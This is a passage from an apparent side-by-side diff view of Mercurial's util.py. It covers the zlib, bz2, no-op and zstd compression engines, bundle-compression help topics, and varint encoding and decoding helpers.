3449 This is the key the engine is registered under.
3454 This is the key the engine is registered under.
3450
3455
3451 This method must be implemented.
3456 This method must be implemented.
3452 """
3457 """
3453 raise NotImplementedError()
3458 raise NotImplementedError()
3454
3459
3455 def available(self):
3460 def available(self):
3456 """Whether the compression engine is available.
3461 """Whether the compression engine is available.
3457
3462
3458 The intent of this method is to allow optional compression engines
3463 The intent of this method is to allow optional compression engines
3459 that may not be available in all installations (such as engines relying
3464 that may not be available in all installations (such as engines relying
3460 on C extensions that may not be present).
3465 on C extensions that may not be present).
3461 """
3466 """
3462 return True
3467 return True
3463
3468
3464 def bundletype(self):
3469 def bundletype(self):
3465 """Describes bundle identifiers for this engine.
3470 """Describes bundle identifiers for this engine.
3466
3471
3467 If this compression engine isn't supported for bundles, returns None.
3472 If this compression engine isn't supported for bundles, returns None.
3468
3473
3469 If this engine can be used for bundles, returns a 2-tuple of strings of
3474 If this engine can be used for bundles, returns a 2-tuple of strings of
3470 the user-facing "bundle spec" compression name and an internal
3475 the user-facing "bundle spec" compression name and an internal
3471 identifier used to denote the compression format within bundles. To
3476 identifier used to denote the compression format within bundles. To
3472 exclude the name from external usage, set the first element to ``None``.
3477 exclude the name from external usage, set the first element to ``None``.
3473
3478
3474 If bundle compression is supported, the class must also implement
3479 If bundle compression is supported, the class must also implement
3475 ``compressstream`` and `decompressorreader``.
3480 ``compressstream`` and `decompressorreader``.
3476
3481
3477 The docstring of this method is used in the help system to tell users
3482 The docstring of this method is used in the help system to tell users
3478 about this engine.
3483 about this engine.
3479 """
3484 """
3480 return None
3485 return None
3481
3486
3482 def wireprotosupport(self):
3487 def wireprotosupport(self):
3483 """Declare support for this compression format on the wire protocol.
3488 """Declare support for this compression format on the wire protocol.
3484
3489
3485 If this compression engine isn't supported for compressing wire
3490 If this compression engine isn't supported for compressing wire
3486 protocol payloads, returns None.
3491 protocol payloads, returns None.
3487
3492
3488 Otherwise, returns ``compenginewireprotosupport`` with the following
3493 Otherwise, returns ``compenginewireprotosupport`` with the following
3489 fields:
3494 fields:
3490
3495
3491 * String format identifier
3496 * String format identifier
3492 * Integer priority for the server
3497 * Integer priority for the server
3493 * Integer priority for the client
3498 * Integer priority for the client
3494
3499
3495 The integer priorities are used to order the advertisement of format
3500 The integer priorities are used to order the advertisement of format
3496 support by server and client. The highest integer is advertised
3501 support by server and client. The highest integer is advertised
3497 first. Integers with non-positive values aren't advertised.
3502 first. Integers with non-positive values aren't advertised.
3498
3503
3499 The priority values are somewhat arbitrary and only used for default
3504 The priority values are somewhat arbitrary and only used for default
3500 ordering. The relative order can be changed via config options.
3505 ordering. The relative order can be changed via config options.
3501
3506
3502 If wire protocol compression is supported, the class must also implement
3507 If wire protocol compression is supported, the class must also implement
3503 ``compressstream`` and ``decompressorreader``.
3508 ``compressstream`` and ``decompressorreader``.
3504 """
3509 """
3505 return None
3510 return None
3506
3511
3507 def revlogheader(self):
3512 def revlogheader(self):
3508 """Header added to revlog chunks that identifies this engine.
3513 """Header added to revlog chunks that identifies this engine.
3509
3514
3510 If this engine can be used to compress revlogs, this method should
3515 If this engine can be used to compress revlogs, this method should
3511 return the bytes used to identify chunks compressed with this engine.
3516 return the bytes used to identify chunks compressed with this engine.
3512 Else, the method should return ``None`` to indicate it does not
3517 Else, the method should return ``None`` to indicate it does not
3513 participate in revlog compression.
3518 participate in revlog compression.
3514 """
3519 """
3515 return None
3520 return None
3516
3521
3517 def compressstream(self, it, opts=None):
3522 def compressstream(self, it, opts=None):
3518 """Compress an iterator of chunks.
3523 """Compress an iterator of chunks.
3519
3524
3520 The method receives an iterator (ideally a generator) of chunks of
3525 The method receives an iterator (ideally a generator) of chunks of
3521 bytes to be compressed. It returns an iterator (ideally a generator)
3526 bytes to be compressed. It returns an iterator (ideally a generator)
3522 of bytes of chunks representing the compressed output.
3527 of bytes of chunks representing the compressed output.
3523
3528
3524 Optionally accepts an argument defining how to perform compression.
3529 Optionally accepts an argument defining how to perform compression.
3525 Each engine treats this argument differently.
3530 Each engine treats this argument differently.
3526 """
3531 """
3527 raise NotImplementedError()
3532 raise NotImplementedError()
3528
3533
3529 def decompressorreader(self, fh):
3534 def decompressorreader(self, fh):
3530 """Perform decompression on a file object.
3535 """Perform decompression on a file object.
3531
3536
3532 Argument is an object with a ``read(size)`` method that returns
3537 Argument is an object with a ``read(size)`` method that returns
3533 compressed data. Return value is an object with a ``read(size)`` that
3538 compressed data. Return value is an object with a ``read(size)`` that
3534 returns uncompressed data.
3539 returns uncompressed data.
3535 """
3540 """
3536 raise NotImplementedError()
3541 raise NotImplementedError()
3537
3542
3538 def revlogcompressor(self, opts=None):
3543 def revlogcompressor(self, opts=None):
3539 """Obtain an object that can be used to compress revlog entries.
3544 """Obtain an object that can be used to compress revlog entries.
3540
3545
3541 The object has a ``compress(data)`` method that compresses binary
3546 The object has a ``compress(data)`` method that compresses binary
3542 data. This method returns compressed binary data or ``None`` if
3547 data. This method returns compressed binary data or ``None`` if
3543 the data could not be compressed (too small, not compressible, etc).
3548 the data could not be compressed (too small, not compressible, etc).
3544 The returned data should have a header uniquely identifying this
3549 The returned data should have a header uniquely identifying this
3545 compression format so decompression can be routed to this engine.
3550 compression format so decompression can be routed to this engine.
3546 This header should be identified by the ``revlogheader()`` return
3551 This header should be identified by the ``revlogheader()`` return
3547 value.
3552 value.
3548
3553
3549 The object has a ``decompress(data)`` method that decompresses
3554 The object has a ``decompress(data)`` method that decompresses
3550 data. The method will only be called if ``data`` begins with
3555 data. The method will only be called if ``data`` begins with
3551 ``revlogheader()``. The method should return the raw, uncompressed
3556 ``revlogheader()``. The method should return the raw, uncompressed
3552 data or raise a ``RevlogError``.
3557 data or raise a ``RevlogError``.
3553
3558
3554 The object is reusable but is not thread safe.
3559 The object is reusable but is not thread safe.
3555 """
3560 """
3556 raise NotImplementedError()
3561 raise NotImplementedError()
3557
3562
3558 class _zlibengine(compressionengine):
3563 class _zlibengine(compressionengine):
3559 def name(self):
3564 def name(self):
3560 return 'zlib'
3565 return 'zlib'
3561
3566
3562 def bundletype(self):
3567 def bundletype(self):
3563 """zlib compression using the DEFLATE algorithm.
3568 """zlib compression using the DEFLATE algorithm.
3564
3569
3565 All Mercurial clients should support this format. The compression
3570 All Mercurial clients should support this format. The compression
3566 algorithm strikes a reasonable balance between compression ratio
3571 algorithm strikes a reasonable balance between compression ratio
3567 and size.
3572 and size.
3568 """
3573 """
3569 return 'gzip', 'GZ'
3574 return 'gzip', 'GZ'
3570
3575
3571 def wireprotosupport(self):
3576 def wireprotosupport(self):
3572 return compewireprotosupport('zlib', 20, 20)
3577 return compewireprotosupport('zlib', 20, 20)
3573
3578
3574 def revlogheader(self):
3579 def revlogheader(self):
3575 return 'x'
3580 return 'x'
3576
3581
3577 def compressstream(self, it, opts=None):
3582 def compressstream(self, it, opts=None):
3578 opts = opts or {}
3583 opts = opts or {}
3579
3584
3580 z = zlib.compressobj(opts.get('level', -1))
3585 z = zlib.compressobj(opts.get('level', -1))
3581 for chunk in it:
3586 for chunk in it:
3582 data = z.compress(chunk)
3587 data = z.compress(chunk)
3583 # Not all calls to compress emit data. It is cheaper to inspect
3588 # Not all calls to compress emit data. It is cheaper to inspect
3584 # here than to feed empty chunks through generator.
3589 # here than to feed empty chunks through generator.
3585 if data:
3590 if data:
3586 yield data
3591 yield data
3587
3592
3588 yield z.flush()
3593 yield z.flush()
3589
3594
3590 def decompressorreader(self, fh):
3595 def decompressorreader(self, fh):
3591 def gen():
3596 def gen():
3592 d = zlib.decompressobj()
3597 d = zlib.decompressobj()
3593 for chunk in filechunkiter(fh):
3598 for chunk in filechunkiter(fh):
3594 while chunk:
3599 while chunk:
3595 # Limit output size to limit memory.
3600 # Limit output size to limit memory.
3596 yield d.decompress(chunk, 2 ** 18)
3601 yield d.decompress(chunk, 2 ** 18)
3597 chunk = d.unconsumed_tail
3602 chunk = d.unconsumed_tail
3598
3603
3599 return chunkbuffer(gen())
3604 return chunkbuffer(gen())
3600
3605
3601 class zlibrevlogcompressor(object):
3606 class zlibrevlogcompressor(object):
3602 def compress(self, data):
3607 def compress(self, data):
3603 insize = len(data)
3608 insize = len(data)
3604 # Caller handles empty input case.
3609 # Caller handles empty input case.
3605 assert insize > 0
3610 assert insize > 0
3606
3611
3607 if insize < 44:
3612 if insize < 44:
3608 return None
3613 return None
3609
3614
3610 elif insize <= 1000000:
3615 elif insize <= 1000000:
3611 compressed = zlib.compress(data)
3616 compressed = zlib.compress(data)
3612 if len(compressed) < insize:
3617 if len(compressed) < insize:
3613 return compressed
3618 return compressed
3614 return None
3619 return None
3615
3620
3616 # zlib makes an internal copy of the input buffer, doubling
3621 # zlib makes an internal copy of the input buffer, doubling
3617 # memory usage for large inputs. So do streaming compression
3622 # memory usage for large inputs. So do streaming compression
3618 # on large inputs.
3623 # on large inputs.
3619 else:
3624 else:
3620 z = zlib.compressobj()
3625 z = zlib.compressobj()
3621 parts = []
3626 parts = []
3622 pos = 0
3627 pos = 0
3623 while pos < insize:
3628 while pos < insize:
3624 pos2 = pos + 2**20
3629 pos2 = pos + 2**20
3625 parts.append(z.compress(data[pos:pos2]))
3630 parts.append(z.compress(data[pos:pos2]))
3626 pos = pos2
3631 pos = pos2
3627 parts.append(z.flush())
3632 parts.append(z.flush())
3628
3633
3629 if sum(map(len, parts)) < insize:
3634 if sum(map(len, parts)) < insize:
3630 return ''.join(parts)
3635 return ''.join(parts)
3631 return None
3636 return None
3632
3637
3633 def decompress(self, data):
3638 def decompress(self, data):
3634 try:
3639 try:
3635 return zlib.decompress(data)
3640 return zlib.decompress(data)
3636 except zlib.error as e:
3641 except zlib.error as e:
3637 raise error.RevlogError(_('revlog decompress error: %s') %
3642 raise error.RevlogError(_('revlog decompress error: %s') %
3638 forcebytestr(e))
3643 forcebytestr(e))
3639
3644
3640 def revlogcompressor(self, opts=None):
3645 def revlogcompressor(self, opts=None):
3641 return self.zlibrevlogcompressor()
3646 return self.zlibrevlogcompressor()
3642
3647
3643 compengines.register(_zlibengine())
3648 compengines.register(_zlibengine())
3644
3649
3645 class _bz2engine(compressionengine):
3650 class _bz2engine(compressionengine):
3646 def name(self):
3651 def name(self):
3647 return 'bz2'
3652 return 'bz2'
3648
3653
3649 def bundletype(self):
3654 def bundletype(self):
3650 """An algorithm that produces smaller bundles than ``gzip``.
3655 """An algorithm that produces smaller bundles than ``gzip``.
3651
3656
3652 All Mercurial clients should support this format.
3657 All Mercurial clients should support this format.
3653
3658
3654 This engine will likely produce smaller bundles than ``gzip`` but
3659 This engine will likely produce smaller bundles than ``gzip`` but
3655 will be significantly slower, both during compression and
3660 will be significantly slower, both during compression and
3656 decompression.
3661 decompression.
3657
3662
3658 If available, the ``zstd`` engine can yield similar or better
3663 If available, the ``zstd`` engine can yield similar or better
3659 compression at much higher speeds.
3664 compression at much higher speeds.
3660 """
3665 """
3661 return 'bzip2', 'BZ'
3666 return 'bzip2', 'BZ'
3662
3667
3663 # We declare a protocol name but don't advertise by default because
3668 # We declare a protocol name but don't advertise by default because
3664 # it is slow.
3669 # it is slow.
3665 def wireprotosupport(self):
3670 def wireprotosupport(self):
3666 return compewireprotosupport('bzip2', 0, 0)
3671 return compewireprotosupport('bzip2', 0, 0)
3667
3672
3668 def compressstream(self, it, opts=None):
3673 def compressstream(self, it, opts=None):
3669 opts = opts or {}
3674 opts = opts or {}
3670 z = bz2.BZ2Compressor(opts.get('level', 9))
3675 z = bz2.BZ2Compressor(opts.get('level', 9))
3671 for chunk in it:
3676 for chunk in it:
3672 data = z.compress(chunk)
3677 data = z.compress(chunk)
3673 if data:
3678 if data:
3674 yield data
3679 yield data
3675
3680
3676 yield z.flush()
3681 yield z.flush()
3677
3682
3678 def decompressorreader(self, fh):
3683 def decompressorreader(self, fh):
3679 def gen():
3684 def gen():
3680 d = bz2.BZ2Decompressor()
3685 d = bz2.BZ2Decompressor()
3681 for chunk in filechunkiter(fh):
3686 for chunk in filechunkiter(fh):
3682 yield d.decompress(chunk)
3687 yield d.decompress(chunk)
3683
3688
3684 return chunkbuffer(gen())
3689 return chunkbuffer(gen())
3685
3690
3686 compengines.register(_bz2engine())
3691 compengines.register(_bz2engine())
3687
3692
3688 class _truncatedbz2engine(compressionengine):
3693 class _truncatedbz2engine(compressionengine):
3689 def name(self):
3694 def name(self):
3690 return 'bz2truncated'
3695 return 'bz2truncated'
3691
3696
3692 def bundletype(self):
3697 def bundletype(self):
3693 return None, '_truncatedBZ'
3698 return None, '_truncatedBZ'
3694
3699
3695 # We don't implement compressstream because it is hackily handled elsewhere.
3700 # We don't implement compressstream because it is hackily handled elsewhere.
3696
3701
3697 def decompressorreader(self, fh):
3702 def decompressorreader(self, fh):
3698 def gen():
3703 def gen():
3699 # The input stream doesn't have the 'BZ' header. So add it back.
3704 # The input stream doesn't have the 'BZ' header. So add it back.
3700 d = bz2.BZ2Decompressor()
3705 d = bz2.BZ2Decompressor()
3701 d.decompress('BZ')
3706 d.decompress('BZ')
3702 for chunk in filechunkiter(fh):
3707 for chunk in filechunkiter(fh):
3703 yield d.decompress(chunk)
3708 yield d.decompress(chunk)
3704
3709
3705 return chunkbuffer(gen())
3710 return chunkbuffer(gen())
3706
3711
3707 compengines.register(_truncatedbz2engine())
3712 compengines.register(_truncatedbz2engine())
3708
3713
3709 class _noopengine(compressionengine):
3714 class _noopengine(compressionengine):
3710 def name(self):
3715 def name(self):
3711 return 'none'
3716 return 'none'
3712
3717
3713 def bundletype(self):
3718 def bundletype(self):
3714 """No compression is performed.
3719 """No compression is performed.
3715
3720
3716 Use this compression engine to explicitly disable compression.
3721 Use this compression engine to explicitly disable compression.
3717 """
3722 """
3718 return 'none', 'UN'
3723 return 'none', 'UN'
3719
3724
3720 # Clients always support uncompressed payloads. Servers don't because
3725 # Clients always support uncompressed payloads. Servers don't because
3721 # unless you are on a fast network, uncompressed payloads can easily
3726 # unless you are on a fast network, uncompressed payloads can easily
3722 # saturate your network pipe.
3727 # saturate your network pipe.
3723 def wireprotosupport(self):
3728 def wireprotosupport(self):
3724 return compewireprotosupport('none', 0, 10)
3729 return compewireprotosupport('none', 0, 10)
3725
3730
3726 # We don't implement revlogheader because it is handled specially
3731 # We don't implement revlogheader because it is handled specially
3727 # in the revlog class.
3732 # in the revlog class.
3728
3733
3729 def compressstream(self, it, opts=None):
3734 def compressstream(self, it, opts=None):
3730 return it
3735 return it
3731
3736
3732 def decompressorreader(self, fh):
3737 def decompressorreader(self, fh):
3733 return fh
3738 return fh
3734
3739
3735 class nooprevlogcompressor(object):
3740 class nooprevlogcompressor(object):
3736 def compress(self, data):
3741 def compress(self, data):
3737 return None
3742 return None
3738
3743
3739 def revlogcompressor(self, opts=None):
3744 def revlogcompressor(self, opts=None):
3740 return self.nooprevlogcompressor()
3745 return self.nooprevlogcompressor()
3741
3746
3742 compengines.register(_noopengine())
3747 compengines.register(_noopengine())
3743
3748
3744 class _zstdengine(compressionengine):
3749 class _zstdengine(compressionengine):
3745 def name(self):
3750 def name(self):
3746 return 'zstd'
3751 return 'zstd'
3747
3752
3748 @propertycache
3753 @propertycache
3749 def _module(self):
3754 def _module(self):
3750 # Not all installs have the zstd module available. So defer importing
3755 # Not all installs have the zstd module available. So defer importing
3751 # until first access.
3756 # until first access.
3752 try:
3757 try:
3753 from . import zstd
3758 from . import zstd
3754 # Force delayed import.
3759 # Force delayed import.
3755 zstd.__version__
3760 zstd.__version__
3756 return zstd
3761 return zstd
3757 except ImportError:
3762 except ImportError:
3758 return None
3763 return None
3759
3764
3760 def available(self):
3765 def available(self):
3761 return bool(self._module)
3766 return bool(self._module)
3762
3767
3763 def bundletype(self):
3768 def bundletype(self):
3764 """A modern compression algorithm that is fast and highly flexible.
3769 """A modern compression algorithm that is fast and highly flexible.
3765
3770
3766 Only supported by Mercurial 4.1 and newer clients.
3771 Only supported by Mercurial 4.1 and newer clients.
3767
3772
3768 With the default settings, zstd compression is both faster and yields
3773 With the default settings, zstd compression is both faster and yields
3769 better compression than ``gzip``. It also frequently yields better
3774 better compression than ``gzip``. It also frequently yields better
3770 compression than ``bzip2`` while operating at much higher speeds.
3775 compression than ``bzip2`` while operating at much higher speeds.
3771
3776
3772 If this engine is available and backwards compatibility is not a
3777 If this engine is available and backwards compatibility is not a
3773 concern, it is likely the best available engine.
3778 concern, it is likely the best available engine.
3774 """
3779 """
3775 return 'zstd', 'ZS'
3780 return 'zstd', 'ZS'
3776
3781
3777 def wireprotosupport(self):
3782 def wireprotosupport(self):
3778 return compewireprotosupport('zstd', 50, 50)
3783 return compewireprotosupport('zstd', 50, 50)
3779
3784
3780 def revlogheader(self):
3785 def revlogheader(self):
3781 return '\x28'
3786 return '\x28'
3782
3787
3783 def compressstream(self, it, opts=None):
3788 def compressstream(self, it, opts=None):
3784 opts = opts or {}
3789 opts = opts or {}
3785 # zstd level 3 is almost always significantly faster than zlib
3790 # zstd level 3 is almost always significantly faster than zlib
3786 # while providing no worse compression. It strikes a good balance
3791 # while providing no worse compression. It strikes a good balance
3787 # between speed and compression.
3792 # between speed and compression.
3788 level = opts.get('level', 3)
3793 level = opts.get('level', 3)
3789
3794
3790 zstd = self._module
3795 zstd = self._module
3791 z = zstd.ZstdCompressor(level=level).compressobj()
3796 z = zstd.ZstdCompressor(level=level).compressobj()
3792 for chunk in it:
3797 for chunk in it:
3793 data = z.compress(chunk)
3798 data = z.compress(chunk)
3794 if data:
3799 if data:
3795 yield data
3800 yield data
3796
3801
3797 yield z.flush()
3802 yield z.flush()
3798
3803
3799 def decompressorreader(self, fh):
3804 def decompressorreader(self, fh):
3800 zstd = self._module
3805 zstd = self._module
3801 dctx = zstd.ZstdDecompressor()
3806 dctx = zstd.ZstdDecompressor()
3802 return chunkbuffer(dctx.read_from(fh))
3807 return chunkbuffer(dctx.read_from(fh))
3803
3808
3804 class zstdrevlogcompressor(object):
3809 class zstdrevlogcompressor(object):
3805 def __init__(self, zstd, level=3):
3810 def __init__(self, zstd, level=3):
3806 # Writing the content size adds a few bytes to the output. However,
3811 # Writing the content size adds a few bytes to the output. However,
3807 # it allows decompression to be more optimal since we can
3812 # it allows decompression to be more optimal since we can
3808 # pre-allocate a buffer to hold the result.
3813 # pre-allocate a buffer to hold the result.
3809 self._cctx = zstd.ZstdCompressor(level=level,
3814 self._cctx = zstd.ZstdCompressor(level=level,
3810 write_content_size=True)
3815 write_content_size=True)
3811 self._dctx = zstd.ZstdDecompressor()
3816 self._dctx = zstd.ZstdDecompressor()
3812 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3817 self._compinsize = zstd.COMPRESSION_RECOMMENDED_INPUT_SIZE
3813 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3818 self._decompinsize = zstd.DECOMPRESSION_RECOMMENDED_INPUT_SIZE
3814
3819
3815 def compress(self, data):
3820 def compress(self, data):
3816 insize = len(data)
3821 insize = len(data)
3817 # Caller handles empty input case.
3822 # Caller handles empty input case.
3818 assert insize > 0
3823 assert insize > 0
3819
3824
3820 if insize < 50:
3825 if insize < 50:
3821 return None
3826 return None
3822
3827
3823 elif insize <= 1000000:
3828 elif insize <= 1000000:
3824 compressed = self._cctx.compress(data)
3829 compressed = self._cctx.compress(data)
3825 if len(compressed) < insize:
3830 if len(compressed) < insize:
3826 return compressed
3831 return compressed
3827 return None
3832 return None
3828 else:
3833 else:
3829 z = self._cctx.compressobj()
3834 z = self._cctx.compressobj()
3830 chunks = []
3835 chunks = []
3831 pos = 0
3836 pos = 0
3832 while pos < insize:
3837 while pos < insize:
3833 pos2 = pos + self._compinsize
3838 pos2 = pos + self._compinsize
3834 chunk = z.compress(data[pos:pos2])
3839 chunk = z.compress(data[pos:pos2])
3835 if chunk:
3840 if chunk:
3836 chunks.append(chunk)
3841 chunks.append(chunk)
3837 pos = pos2
3842 pos = pos2
3838 chunks.append(z.flush())
3843 chunks.append(z.flush())
3839
3844
3840 if sum(map(len, chunks)) < insize:
3845 if sum(map(len, chunks)) < insize:
3841 return ''.join(chunks)
3846 return ''.join(chunks)
3842 return None
3847 return None
3843
3848
3844 def decompress(self, data):
3849 def decompress(self, data):
3845 insize = len(data)
3850 insize = len(data)
3846
3851
3847 try:
3852 try:
3848 # This was measured to be faster than other streaming
3853 # This was measured to be faster than other streaming
3849 # decompressors.
3854 # decompressors.
3850 dobj = self._dctx.decompressobj()
3855 dobj = self._dctx.decompressobj()
3851 chunks = []
3856 chunks = []
3852 pos = 0
3857 pos = 0
3853 while pos < insize:
3858 while pos < insize:
3854 pos2 = pos + self._decompinsize
3859 pos2 = pos + self._decompinsize
3855 chunk = dobj.decompress(data[pos:pos2])
3860 chunk = dobj.decompress(data[pos:pos2])
3856 if chunk:
3861 if chunk:
3857 chunks.append(chunk)
3862 chunks.append(chunk)
3858 pos = pos2
3863 pos = pos2
3859 # Frame should be exhausted, so no finish() API.
3864 # Frame should be exhausted, so no finish() API.
3860
3865
3861 return ''.join(chunks)
3866 return ''.join(chunks)
3862 except Exception as e:
3867 except Exception as e:
3863 raise error.RevlogError(_('revlog decompress error: %s') %
3868 raise error.RevlogError(_('revlog decompress error: %s') %
3864 forcebytestr(e))
3869 forcebytestr(e))
3865
3870
3866 def revlogcompressor(self, opts=None):
3871 def revlogcompressor(self, opts=None):
3867 opts = opts or {}
3872 opts = opts or {}
3868 return self.zstdrevlogcompressor(self._module,
3873 return self.zstdrevlogcompressor(self._module,
3869 level=opts.get('level', 3))
3874 level=opts.get('level', 3))
3870
3875
3871 compengines.register(_zstdengine())
3876 compengines.register(_zstdengine())
3872
3877
3873 def bundlecompressiontopics():
3878 def bundlecompressiontopics():
3874 """Obtains a list of available bundle compressions for use in help."""
3879 """Obtains a list of available bundle compressions for use in help."""
3875 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3880 # help.makeitemsdocs() expects a dict of names to items with a .__doc__.
3876 items = {}
3881 items = {}
3877
3882
3878 # We need to format the docstring. So use a dummy object/type to hold it
3883 # We need to format the docstring. So use a dummy object/type to hold it
3879 # rather than mutating the original.
3884 # rather than mutating the original.
3880 class docobject(object):
3885 class docobject(object):
3881 pass
3886 pass
3882
3887
3883 for name in compengines:
3888 for name in compengines:
3884 engine = compengines[name]
3889 engine = compengines[name]
3885
3890
3886 if not engine.available():
3891 if not engine.available():
3887 continue
3892 continue
3888
3893
3889 bt = engine.bundletype()
3894 bt = engine.bundletype()
3890 if not bt or not bt[0]:
3895 if not bt or not bt[0]:
3891 continue
3896 continue
3892
3897
3893 doc = pycompat.sysstr('``%s``\n %s') % (
3898 doc = pycompat.sysstr('``%s``\n %s') % (
3894 bt[0], engine.bundletype.__doc__)
3899 bt[0], engine.bundletype.__doc__)
3895
3900
3896 value = docobject()
3901 value = docobject()
3897 value.__doc__ = doc
3902 value.__doc__ = doc
3898 value._origdoc = engine.bundletype.__doc__
3903 value._origdoc = engine.bundletype.__doc__
3899 value._origfunc = engine.bundletype
3904 value._origfunc = engine.bundletype
3900
3905
3901 items[bt[0]] = value
3906 items[bt[0]] = value
3902
3907
3903 return items
3908 return items
3904
3909
3905 i18nfunctions = bundlecompressiontopics().values()
3910 i18nfunctions = bundlecompressiontopics().values()
3906
3911
3907 # convenient shortcut
3912 # convenient shortcut
3908 dst = debugstacktrace
3913 dst = debugstacktrace
3909
3914
3910 def safename(f, tag, ctx, others=None):
3915 def safename(f, tag, ctx, others=None):
3911 """
3916 """
3912 Generate a name that it is safe to rename f to in the given context.
3917 Generate a name that it is safe to rename f to in the given context.
3913
3918
3914 f: filename to rename
3919 f: filename to rename
3915 tag: a string tag that will be included in the new name
3920 tag: a string tag that will be included in the new name
3916 ctx: a context, in which the new name must not exist
3921 ctx: a context, in which the new name must not exist
3917 others: a set of other filenames that the new name must not be in
3922 others: a set of other filenames that the new name must not be in
3918
3923
3919 Returns a file name of the form oldname~tag[~number] which does not exist
3924 Returns a file name of the form oldname~tag[~number] which does not exist
3920 in the provided context and is not in the set of other names.
3925 in the provided context and is not in the set of other names.
3921 """
3926 """
3922 if others is None:
3927 if others is None:
3923 others = set()
3928 others = set()
3924
3929
3925 fn = '%s~%s' % (f, tag)
3930 fn = '%s~%s' % (f, tag)
3926 if fn not in ctx and fn not in others:
3931 if fn not in ctx and fn not in others:
3927 return fn
3932 return fn
3928 for n in itertools.count(1):
3933 for n in itertools.count(1):
3929 fn = '%s~%s~%s' % (f, tag, n)
3934 fn = '%s~%s~%s' % (f, tag, n)
3930 if fn not in ctx and fn not in others:
3935 if fn not in ctx and fn not in others:
3931 return fn
3936 return fn
3932
3937
3933 def readexactly(stream, n):
3938 def readexactly(stream, n):
3934 '''read n bytes from stream.read and abort if less was available'''
3939 '''read n bytes from stream.read and abort if less was available'''
3935 s = stream.read(n)
3940 s = stream.read(n)
3936 if len(s) < n:
3941 if len(s) < n:
3937 raise error.Abort(_("stream ended unexpectedly"
3942 raise error.Abort(_("stream ended unexpectedly"
3938 " (got %d bytes, expected %d)")
3943 " (got %d bytes, expected %d)")
3939 % (len(s), n))
3944 % (len(s), n))
3940 return s
3945 return s
3941
3946
3942 def uvarintencode(value):
3947 def uvarintencode(value):
3943 """Encode an unsigned integer value to a varint.
3948 """Encode an unsigned integer value to a varint.
3944
3949
3945 A varint is a variable length integer of 1 or more bytes. Each byte
3950 A varint is a variable length integer of 1 or more bytes. Each byte
3946 except the last has the most significant bit set. The lower 7 bits of
3951 except the last has the most significant bit set. The lower 7 bits of
3947 each byte store the 2's complement representation, least significant group
3952 each byte store the 2's complement representation, least significant group
3948 first.
3953 first.
3949
3954
3950 >>> uvarintencode(0)
3955 >>> uvarintencode(0)
3951 '\\x00'
3956 '\\x00'
3952 >>> uvarintencode(1)
3957 >>> uvarintencode(1)
3953 '\\x01'
3958 '\\x01'
3954 >>> uvarintencode(127)
3959 >>> uvarintencode(127)
3955 '\\x7f'
3960 '\\x7f'
3956 >>> uvarintencode(1337)
3961 >>> uvarintencode(1337)
3957 '\\xb9\\n'
3962 '\\xb9\\n'
3958 >>> uvarintencode(65536)
3963 >>> uvarintencode(65536)
3959 '\\x80\\x80\\x04'
3964 '\\x80\\x80\\x04'
3960 >>> uvarintencode(-1)
3965 >>> uvarintencode(-1)
3961 Traceback (most recent call last):
3966 Traceback (most recent call last):
3962 ...
3967 ...
3963 ProgrammingError: negative value for uvarint: -1
3968 ProgrammingError: negative value for uvarint: -1
3964 """
3969 """
3965 if value < 0:
3970 if value < 0:
3966 raise error.ProgrammingError('negative value for uvarint: %d'
3971 raise error.ProgrammingError('negative value for uvarint: %d'
3967 % value)
3972 % value)
3968 bits = value & 0x7f
3973 bits = value & 0x7f
3969 value >>= 7
3974 value >>= 7
3970 bytes = []
3975 bytes = []
3971 while value:
3976 while value:
3972 bytes.append(pycompat.bytechr(0x80 | bits))
3977 bytes.append(pycompat.bytechr(0x80 | bits))
3973 bits = value & 0x7f
3978 bits = value & 0x7f
3974 value >>= 7
3979 value >>= 7
3975 bytes.append(pycompat.bytechr(bits))
3980 bytes.append(pycompat.bytechr(bits))
3976
3981
3977 return ''.join(bytes)
3982 return ''.join(bytes)
3978
3983
3979 def uvarintdecodestream(fh):
3984 def uvarintdecodestream(fh):
3980 """Decode an unsigned variable length integer from a stream.
3985 """Decode an unsigned variable length integer from a stream.
3981
3986
3982 The passed argument is anything that has a ``.read(N)`` method.
3987 The passed argument is anything that has a ``.read(N)`` method.
3983
3988
3984 >>> try:
3989 >>> try:
3985 ... from StringIO import StringIO as BytesIO
3990 ... from StringIO import StringIO as BytesIO
3986 ... except ImportError:
3991 ... except ImportError:
3987 ... from io import BytesIO
3992 ... from io import BytesIO
3988 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3993 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3989 0
3994 0
3990 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3995 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3991 1
3996 1
3992 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3997 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3993 127
3998 127
3994 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3999 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3995 1337
4000 1337
3996 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
4001 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3997 65536
4002 65536
3998 >>> uvarintdecodestream(BytesIO(b'\\x80'))
4003 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3999 Traceback (most recent call last):
4004 Traceback (most recent call last):
4000 ...
4005 ...
4001 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4006 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
4002 """
4007 """
4003 result = 0
4008 result = 0
4004 shift = 0
4009 shift = 0
4005 while True:
4010 while True:
4006 byte = ord(readexactly(fh, 1))
4011 byte = ord(readexactly(fh, 1))
4007 result |= ((byte & 0x7f) << shift)
4012 result |= ((byte & 0x7f) << shift)
4008 if not (byte & 0x80):
4013 if not (byte & 0x80):
4009 return result
4014 return result
4010 shift += 7
4015 shift += 7
4011
4016
4012 ###
4017 ###
4013 # Deprecation warnings for util.py splitting
4018 # Deprecation warnings for util.py splitting
4014 ###
4019 ###
4015
4020
4016 defaultdateformats = dateutil.defaultdateformats
4021 defaultdateformats = dateutil.defaultdateformats
4017
4022
4018 extendeddateformats = dateutil.extendeddateformats
4023 extendeddateformats = dateutil.extendeddateformats
4019
4024
4020 def makedate(*args, **kwargs):
4025 def makedate(*args, **kwargs):
4021 msg = ("'util.makedate' is deprecated, "
4026 msg = ("'util.makedate' is deprecated, "
4022 "use 'utils.dateutil.makedate'")
